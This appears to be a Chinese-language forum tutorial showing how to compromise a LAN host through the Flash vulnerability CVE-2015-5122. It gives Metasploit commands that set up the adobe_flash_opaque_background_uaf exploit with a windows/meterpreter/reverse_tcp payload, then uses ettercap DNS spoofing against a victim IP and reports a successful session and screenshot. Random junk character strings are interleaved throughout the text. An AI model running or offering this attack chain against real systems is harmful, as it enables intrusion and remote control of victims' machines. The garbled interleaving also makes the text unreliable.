; H. g' `, h$ l+ g I* W0 H' F 二、cve2015-5122漏洞实例演示虚拟机 & |8 C( ~8 f7 y1 H: J7 e
6 M) P5 C/ t0 A5 W0 T; L' t3 j, A: {2 [
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
' [7 G7 z( ]% h 9 \( H+ V5 V: M+ I# P8 Q' ?
, z5 t/ O; x( {0 V' k! u6 g
search cve-2015-5122如图:
$ \! F8 V% o+ t0 u6 O
# Q* O! s1 V* \. p1 i* T$ W$ d( m# e+ }
6 Q3 k9 ]6 }1 S% q# C! L$ P
( w0 ^ @) o* u7 U; i; w" N
" J# s$ e: ]7 i& h: ^ 下面我们敲如下命令:
0 `0 o9 |1 ~" ?8 r% N$ L0 | 7 @* C: J# {7 ]: j
/ o: G8 X" |8 |) q& ]% N2 k use exploit/multi/browser/adobe_flash_opaque_background_uaf 3 I9 Y+ C- Z3 a4 W& y& t9 @
+ v9 ]$ h" y- ^; }3 F
2 p, p0 x2 V0 v set PAYLOAD windows/meterpreter/reverse_tcp
- C' b- n! c, a: W) L h8 [' z 3 P% s; X) {# h7 Q" S# \
' u8 t2 y/ \' e6 E' l8 v4 S6 f set LHOST 192.168.0.109
3 {* X# ~ s# g/ i# d* k) z
' I r% R: M4 B
+ a E8 Z y; A# }4 m& K0 ? n set URIPATH / /*根目录*/
) Q$ U+ t5 e9 x5 A: a/ `( d3 j3 b E i0 s6 ]! b7 T' w' u9 M, H7 h
0 ?, [+ y/ [8 C/ W set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 E: X7 ~3 L# i" W5 Z. } ( K3 k( o1 T& I+ b! w0 z! n9 y
1 [- Y+ _. ^5 ? set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 - a; y" Z1 `7 G1 w6 \' t! M
) S1 d* y0 i+ a4 G) l, v! g5 u
, m6 Z1 x: B# F
然后show options如图:
7 _: d) f: O0 M c0 h
. f- s" b( V# o( t3 T6 {* [& s7 {7 a' C# Q2 e/ p6 r/ W
# z' h, E( I/ M% p8 z2 g; [9 I
4 n5 E- U5 G/ L$ {4 `
9 N" H. B/ E9 n" c' J" t
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ! L- B0 s( M; `& G" H
3 I/ z6 ?3 R) k0 ^( \$ _
* A+ I. N: u# s9 P! L6 J; U8 w. Z& w9 e3 D% L4 a3 J m
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 6 U8 f ^: h: h) d1 X* ]
4 @! t( t6 L! Y0 g0 m/ x5 @# g* L3 e
% |; c; _# o, N% O; J* k& D
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf # M3 i0 _# w$ m7 C
& s4 y/ u7 u8 ]0 s" I' F9 D
6 |5 L/ v% `) U( \& j
" K9 z6 ?( l6 L5 b0 S* D ( Z8 W- i! B$ |; A5 ~6 Z/ O
( I& |) e# c6 P; r
成功了,这时候我们断开ettercap,如图: 7 C9 e# A: ^7 M& _ Q
- d* A7 B1 ?# ?
% N" `" _( N: N( C1 ]
~. m# Y: C4 W3 r: d: |4 X
# S9 v3 R( k% @. X/ s8 O: E
. Q; n, ` ^/ W7 ^4 p Screenshot如图: ) [3 q7 @" U7 c( p( h: ?
+ v8 m+ ]' Q7 ~4 q& Q3 ] s; ^8 D$ ?0 e; D/ G1 ]- \4 e+ g
a* h; T7 |+ E6 G# v+ z
0 b- o$ o) ^2 r* n4 P
- G5 R ^ X& o% K/ R
2 j) s4 ?% K0 S |